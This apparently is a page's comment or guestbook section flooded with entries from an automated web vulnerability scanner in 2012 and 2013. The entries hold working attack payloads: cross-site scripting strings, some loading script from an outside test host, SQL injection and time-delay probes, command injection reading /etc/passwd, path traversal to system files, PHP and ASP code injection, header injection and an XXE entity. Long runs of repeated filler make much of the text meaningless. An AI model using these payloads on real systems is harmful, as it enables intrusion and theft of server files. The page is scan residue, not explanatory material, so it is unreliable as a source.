.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
# <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951926)"></g></svg> on 6 November 2012 at 15:29:

1
# 1 on 6 November 2012 at 15:29:

WEB-INF/web.xml
# 1 on 6 November 2012 at 15:29:

WEB-INF\web.xml
# 1[url=javascript:prompt(962601)]http://www.acunetix.com[/url] on 6 November 2012 at 15:29:

1
# 1<div style=width:expression(prompt(907053))> on 6 November 2012 at 15:29:

1
# <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='980089'> on 6 November 2012 at 15:29:

1
# <body onload=prompt(911266)> on 6 November 2012 at 15:29:

1
# <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918877)> on 6 November 2012 at 15:29:

1
# <img src=xyz OnErRor=prompt(906602)> on 6 November 2012 at 15:30:

1
# <img/src=">" onerror=alert(988091)> on 6 November 2012 at 15:30:

1
# 1%3CScRiPt%20%3Eprompt(917634)%3C/sCripT%3E on 6 November 2012 at 15:30:

1
# o<img acu onmouseover=prompt(995982) //o> on 6 November 2012 at 15:30:

1
# <input autofocus onfocus=prompt(902585)> on 6 November 2012 at 15:30:

1
# z12S1 1<ScRiPt >prompt(986591)</ScRiPt> on 6 November 2012 at 15:30:

1
# 1 on 6 November 2012 at 15:30:

'"()&%1<ScRiPt >prompt(964371)</ScRiPt>
# 1 on 6 November 2012 at 15:30:

OTc4NDM1
# 1 on 6 November 2012 at 15:30:

undefined1<ScRiPt >prompt(993301)</ScRiPt>
# 1 on 6 November 2012 at 15:30:

1<ScRiPt
>prompt(901874)</ScRiPt>
# 1 on 6 November 2012 at 15:30:

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?921851></ScRiPt>
# 1 on 6 November 2012 at 15:30:

1<ScRiPt
>prompt(983387)</ScRiPt>
# 1 on 6 November 2012 at 15:30:

<video><source onerror="javascript:prompt(998390)">
# 1 on 6 November 2012 at 15:30:

<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(997363)"></g></svg>
# 1 on 6 November 2012 at 15:30:

1[url=javascript:prompt(943672)]http://www.acunetix.com[/url]
# 1 on 6 November 2012 at 15:30:

1<div style=width:expression(prompt(931662))>
# 1 on 6 November 2012 at 15:30:

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='981448'>
# 1 on 6 November 2012 at 15:30:

<body onload=prompt(935199)>
# 1 on 6 November 2012 at 15:30:

<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(930854)>
# 1 on 6 November 2012 at 15:30:

<img src=xyz OnErRor=prompt(973339)>
# 1 on 6 November 2012 at 15:30:

<img/src=">" onerror=alert(975112)>
# 1 on 6 November 2012 at 15:30:

1%3CScRiPt%20%3Eprompt(911009)%3C/sCripT%3E
# 1 on 6 November 2012 at 15:31:

o<img acu onmouseover=prompt(971088) //o>
# 1 on 6 November 2012 at 15:31:

<input autofocus onfocus=prompt(986961)>
# 1 on 6 November 2012 at 15:31:

neTTt
1<ScRiPt >prompt(925428)</ScRiPt>
# 1 on 22 January 2013 at 12:07:

1
# 1 on 22 January 2013 at 16:32:

1
# 1 on 22 January 2013 at 16:52:

1
# response.write(9443166*9281208) on 22 January 2013 at 23:38:

1
# '+response.write(9443166*9281208)+' on 22 January 2013 at 23:38:

1
# "+response.write(9443166*9281208)+" on 22 January 2013 at 23:38:

1
# 1 on 22 January 2013 at 23:39:

1
# &cat /etc/passwd& on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

1
# '&cat /etc/passwd&' on 22 January 2013 at 23:39:

1
# -1 or 100=100 on 22 January 2013 at 23:39:

1
# SomeCustomInjectedHeader:injected_by_wvs on 22 January 2013 at 23:39:

1
# -1 or 100=0 on 22 January 2013 at 23:39:

1
# SomeCustomInjectedHeader:injected_by_wvs on 22 January 2013 at 23:39:

1
# SomeCustomInjectedHeader:injected_by_wvs on 22 January 2013 at 23:39:

1
# "&cat /etc/passwd&" on 22 January 2013 at 23:39:

1
# -1' or '22'='22 on 22 January 2013 at 23:39:

1
# cat /etc/passwd on 22 January 2013 at 23:39:

1
# -1' or '22'='0 on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

response.write(9641837*9141538)
# `cat /etc/passwd` on 22 January 2013 at 23:39:

1
# -1" or "83"="83 on 22 January 2013 at 23:39:

1
# |cat /etc/passwd# on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

'+response.write(9641837*9141538)+'
# -1" or "83"="0 on 22 January 2013 at 23:39:

1
# '|'ld on 22 January 2013 at 23:39:

1
# 1 and sleep(4) on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

"+response.write(9641837*9141538)+"
# "|"ld on 22 January 2013 at 23:39:

1
# 1 or (sleep(4)+1) limit 1 -- on 22 January 2013 at 23:39:

1
# ../../../../../../../../../../etc/passwd on 22 January 2013 at 23:39:

1
# ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 22 January 2013 at 23:39:

1
# ;cat /etc/passwd; on 22 January 2013 at 23:39:

1
# 1' and sleep(4)=' on 22 January 2013 at 23:39:

1
# ../../../../../../../../../../etc/passwd.jpg on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

SomeCustomInjectedHeader:injected_by_wvs
# 1' and (sleep(4)+1) limit 1 -- on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

SomeCustomInjectedHeader:injected_by_wvs
# ';cat /etc/passwd;' on 22 January 2013 at 23:39:

1
# Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n on 22 January 2013 at 23:39:

1
# 1" and sleep(4)=" on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

SomeCustomInjectedHeader:injected_by_wvs
# ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg on 22 January 2013 at 23:39:

1
# ";cat /etc/passwd;" on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

1
# 1' or (sleep(4)+1) limit 1 -- on 22 January 2013 at 23:39:

1
# ||cat /etc/passwd on 22 January 2013 at 23:39:

1
# /../..//../..//../..//../..//../..//etc/passwd.jpg on 22 January 2013 at 23:39:

1
# 1" or (sleep(4)+1) limit 1 -- on 22 January 2013 at 23:39:

1
# 1'=sleep(4)=' on 22 January 2013 at 23:39:

1
# &dir on 22 January 2013 at 23:39:

1
# .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd on 22 January 2013 at 23:39:

1
# 1"=sleep(4)=" on 22 January 2013 at 23:39:

1
# '&dir&' on 22 January 2013 at 23:39:

1
# ${99953+99152} on 22 January 2013 at 23:39:

1
# /etc/passwd on 22 January 2013 at 23:39:

1
# 1;select pg_sleep(4); -- on 22 January 2013 at 23:39:

1
# 268435455 on 22 January 2013 at 23:39:

1
# "&dir&" on 22 January 2013 at 23:39:

1
# ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd on 22 January 2013 at 23:39:

1
# http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg on 22 January 2013 at 23:39:

1
# on 22 January 2013 at 23:39:

1
# 1some_inexistent_file_with_long_name%00.jpg on 22 January 2013 at 23:39:

1
# ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd on 22 January 2013 at 23:39:

1
# |dir on 22 January 2013 at 23:39:

1
# .. on 22 January 2013 at 23:39:

1
# http://testasp.vulnweb.com/t/fit.txt?%00.jpg on 22 January 2013 at 23:39:

1
# .. on 22 January 2013 at 23:39:

1
# '|dir on 22 January 2013 at 23:39:

1
# 1';select pg_sleep(4); -- on 22 January 2013 at 23:39:

1
# 1e309 on 22 January 2013 at 23:39:

1
# invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././ on 22 January 2013 at 23:39:

1
# "|dir on 22 January 2013 at 23:39:

1
# 1; waitfor delay '0:0:4' -- on 22 January 2013 at 23:39:

1
# 1'; waitfor delay '0:0:4' -- on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

${99059+100266}
# 1&n939203=v967762 on 22 January 2013 at 23:39:

1
# '"\'\");|]*{ <> on 22 January 2013 at 23:39:

1
# file:///etc/passwd on 22 January 2013 at 23:39:

1
# ) on 22 January 2013 at 23:39:

1
# 1"; waitfor delay '0:0:4' -- on 22 January 2013 at 23:39:

1
# /\../\../\../\../\../\../\../etc/passwd on 22 January 2013 at 23:39:

1
# Array on 22 January 2013 at 23:39:

1
# !(()&&!|*|*| on 22 January 2013 at 23:39:

1
# ../../../../../../../../../../windows/win.ini on 22 January 2013 at 23:39:

1
# ../../../../../../../../../../boot.ini on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

1&n934767=v928792
# ^(#$!@#$)(()))****** on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
# Array on 22 January 2013 at 23:39:

1
# ../../../../../../../../../../windows/win.ini.jpg on 22 January 2013 at 23:39:

1
# '"() on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

1some_inexistent_file_with_long_name%00.jpg
# on 22 January 2013 at 23:39:

1
# ................windowswin.ini on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

http://testasp.vulnweb.com/t/fit.txt?%00.jpg
# ;print(md5(acunetix_wvs_security_test)); on 22 January 2013 at 23:39:

1
# ..\..\..\..\..\..\..\..\windows\win.ini on 22 January 2013 at 23:39:

1
# http://testasp.vulnweb.com/t/xss.html?%00.jpg on 22 January 2013 at 23:39:

1
# ';print(md5(acunetix_wvs_security_test));$a=' on 22 January 2013 at 23:39:

1
# /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini on 22 January 2013 at 23:39:

1
# ";print(md5(acunetix_wvs_security_test));$a=" on 22 January 2013 at 23:39:

1
# ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini on 22 January 2013 at 23:39:

1
# ${@print(md5(acunetix_wvs_security_test))} on 22 January 2013 at 23:39:

1
# ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini on 22 January 2013 at 23:39:

1
# ${@print(md5(acunetix_wvs_security_test))}\ on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

)
# unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\ on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

Array
# 1 on 22 January 2013 at 23:39:

'"()
# 1 on 22 January 2013 at 23:39:

!(()&&!|*|*|
# 1 on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

^(#$!@#$)(()))******
# 1 on 22 January 2013 at 23:39:

1
# acunetix_wvs_invalid_filename on 22 January 2013 at 23:39:

1
# 1'" on 22 January 2013 at 23:39:

1
# 6443 on 22 January 2013 at 23:39:

1
# \ on 22 January 2013 at 23:39:

1
# 6443 on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

http://testasp.vulnweb.com/t/xss.html?%00.jpg
# 6443/. on 22 January 2013 at 23:39:

1
# 1Axa7Ac on 22 January 2013 at 23:39:

1
# @@ObH9f on 22 January 2013 at 23:39:

1
# ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) on 22 January 2013 at 23:39:

1
# JyI= on 22 January 2013 at 23:39:

1
# ?'?" on 22 January 2013 at 23:39:

1
# ?''?"" on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
# 1 on 22 January 2013 at 23:39:

1
# //www.acunetix.tst on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

;print(md5(acunetix_wvs_security_test));
# <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testphp.vulnweb.com/dot.gif"> ]> <xxx>&acunetixe on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

//www.acunetix.tst
# 1 on 22 January 2013 at 23:39:

';print(md5(acunetix_wvs_security_test));$a='
# 1 on 22 January 2013 at 23:39:

268435455
# 1 on 22 January 2013 at 23:39:

";print(md5(acunetix_wvs_security_test));$a="
# 1 on 22 January 2013 at 23:39:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE acunetix [
<!ENTITY acunetixent SYSTEM "http://testphp.vulnweb.com/dot.gif">
]>
<xxx>&acunetixent;</xxx>
# 1 on 22 January 2013 at 23:39:
# '"()&%1<ScRiPt >prompt(969519)</ScRiPt> on 22 January 2013 at 23:39:

1
# '" on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

..
# <!-- on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

${@print(md5(acunetix_wvs_security_test))}
# 1 on 22 January 2013 at 23:39:

1e309
# 1 on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

${@print(md5(acunetix_wvs_security_test))}\
# OTM1NzEx on 22 January 2013 at 23:39:

1
# 1 on 22 January 2013 at 23:39:

'"\'\");|]*{
<>
# 1 on 22 January 2013 at 23:40:

acunetix_wvs_invalid_filename
# 1 on 22 January 2013 at 23:40:

Array
# 1 on 22 January 2013 at 23:40:

6443
# undefined1<ScRiPt >prompt(959574)</ScRiPt> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

6443
# 1 on 22 January 2013 at 23:40:

'"
# 1 on 22 January 2013 at 23:40:

6443/.
# 1 on 22 January 2013 at 23:40:

<!--
# 1<ScRiPt >prompt(947987)</ScRiPt> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

&cat /etc/passwd&
# 1 on 22 January 2013 at 23:40:

'&cat /etc/passwd&'
# 1 on 22 January 2013 at 23:40:

"&cat /etc/passwd&"
# 1 on 22 January 2013 at 23:40:

1'"
# 1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?965102></ScRiPt> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

cat /etc/passwd
# 1 on 22 January 2013 at 23:40:

\
# 1 on 22 January 2013 at 23:40:

`cat /etc/passwd`
# 1 on 22 January 2013 at 23:40:

|cat /etc/passwd#
# 1 on 22 January 2013 at 23:40:

1Axa7Ac
# 1 on 22 January 2013 at 23:40:

'|'ld
# 1<ScRiPt >prompt(937314)</ScRiPt> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

@@6roF3
# 1 on 22 January 2013 at 23:40:

"|"ld
# 1 on 22 January 2013 at 23:40:

JyI=
# 1 on 22 January 2013 at 23:40:

;cat /etc/passwd;
# 1 on 22 January 2013 at 23:40:

?'?"
# 1 on 22 January 2013 at 23:40:

';cat /etc/passwd;'
# <video><source onerror="javascript:prompt(919664)"> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

?''?""
# 1 on 22 January 2013 at 23:40:

";cat /etc/passwd;"
# 1 on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

||cat /etc/passwd
# 1 on 22 January 2013 at 23:40:

1
# <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924536)"></g></svg> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

-1 or 95=95
# 1 on 22 January 2013 at 23:40:

&dir
# 1 on 22 January 2013 at 23:40:

-1 or 95=0
# 1 on 22 January 2013 at 23:40:

'&dir&'
# 1 on 22 January 2013 at 23:40:

-1' or '93'='93
# 1 on 22 January 2013 at 23:40:

"&dir&"
# 1 on 22 January 2013 at 23:40:

|dir
# 1 on 22 January 2013 at 23:40:

-1' or '93'='0
# 1[url=javascript:prompt(946299)]http://www.acunetix.com[/url] on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

'|dir
# 1 on 22 January 2013 at 23:40:

-1" or "84"="84
# 1 on 22 January 2013 at 23:40:

"|dir
# 1 on 22 January 2013 at 23:40:

-1" or "84"="0
# 1<div style=width:expression(prompt(900284))> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

1 and sleep(4.118)
# 1 on 22 January 2013 at 23:40:

1 or (sleep(4.118)+1) limit 1 --
# <iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='978858'> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

1' and sleep(4.118)='
# 1 on 22 January 2013 at 23:40:

1' and (sleep(4.118)+1) limit 1 --
# <body onload=prompt(969069)> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

../../../../../../../../../../etc/passwd
# 1 on 22 January 2013 at 23:40:

1" and sleep(4.118)="
# 1 on 22 January 2013 at 23:40:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
# 1 on 22 January 2013 at 23:40:

../../../../../../../../../../etc/passwd.jpg
# 1 on 22 January 2013 at 23:40:

1' or (sleep(4.118)+1) limit 1 --
# 1 on 22 January 2013 at 23:40:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
# 1 on 22 January 2013 at 23:40:

1" or (sleep(4.118)+1) limit 1 --
# 1 on 22 January 2013 at 23:40:

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
# 1 on 22 January 2013 at 23:40:

1'=sleep(4.118)='
# <img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(902721)> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

/../..//../..//../..//../..//../..//etc/passwd.jpg
# 1 on 22 January 2013 at 23:40:

1"=sleep(4.118)="
# 1 on 22 January 2013 at 23:40:

1;select pg_sleep(4.118); --
# 1 on 22 January 2013 at 23:40:

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
# 1 on 22 January 2013 at 23:40:

1';select pg_sleep(4.118); --
# <img src=xyz OnErRor=prompt(956079)> on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

/etc/passwd
# 1 on 22 January 2013 at 23:40:

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
# 1 on 22 January 2013 at 23:40:

1; waitfor delay '0:0:4.118' --
# 1 on 22 January 2013 at 23:40:

1'; waitfor delay '0:0:4.118' --
# 1 on 22 January 2013 at 23:40:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
# 1%3CScRiPt%20%3Eprompt(909653)%3C/sCripT%3E on 22 January 2013 at 23:40:

1
# 1 on 22 January 2013 at 23:40:

..
# 1 on 22 January 2013 at 23:41:

1"; waitfor delay '0:0:4.118' --
# 1 on 22 January 2013 at 23:41:

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
# 1 on 22 January 2013 at 23:41:

file:///etc/passwd
# on 22 January 2013 at 23:41:

1
# 1 on 22 January 2013 at 23:41:

/\../\../\../\../\../\../\../etc/passwd
# 1 on 22 January 2013 at 23:41:

../../../../../../../../../../windows/win.ini
# 1 on 22 January 2013 at 23:41:

../../../../../../../../../../boot.ini
# 1 on 22 January 2013 at 23:41:

../../../../../../../../../../windows/win.ini.jpg
# <input autofocus onfocus=prompt(952097)> on 22 January 2013 at 23:41:

1
# 1 on 22 January 2013 at 23:41:
# 1 on 22 January 2013 at 23:41:

................windowswin.ini
# 1 on 22 January 2013 at 23:41:

..\..\..\..\..\..\..\..\windows\win.ini
# 1 on 22 January 2013 at 23:41:

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
# 1 on 22 January 2013 at 23:41:

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
# lBAL9 1<ScRiPt >prompt(972259)</ScRiPt> on 22 January 2013 at 23:41:

1
# 1 on 22 January 2013 at 23:41:

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
# 1 on 22 January 2013 at 23:41:

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.